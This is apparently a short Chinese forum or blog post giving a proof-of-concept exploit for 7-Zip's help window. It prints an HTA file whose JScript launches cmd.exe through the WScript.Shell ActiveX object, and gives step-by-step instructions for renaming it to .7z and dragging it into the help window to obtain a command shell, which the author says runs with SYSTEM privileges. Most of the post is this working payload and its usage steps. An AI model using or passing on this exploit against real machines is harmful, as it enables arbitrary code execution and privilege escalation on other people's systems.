这玩意儿很简单,原理不清楚,不过7-zip官方并不承认这个漏洞,他们说这个洞是微软的锅,不过我看也确实是。
1 2 3 4 5 6 7 8 9
| <html> <head> <HTA:APPLICATION ID="7zipcodeexec"> <script language="jscript"> var c = "cmd.exe"; new ActiveXObject('WScript.Shell').Run(c); </script> <head> <html>
|
找个文本文件把上面的内容写进去,然后讲后缀名改为7z。然后讲这个文件拖动到7zip的helper窗口中就会弹出DOS窗口,查看当前权限可以看到为system权限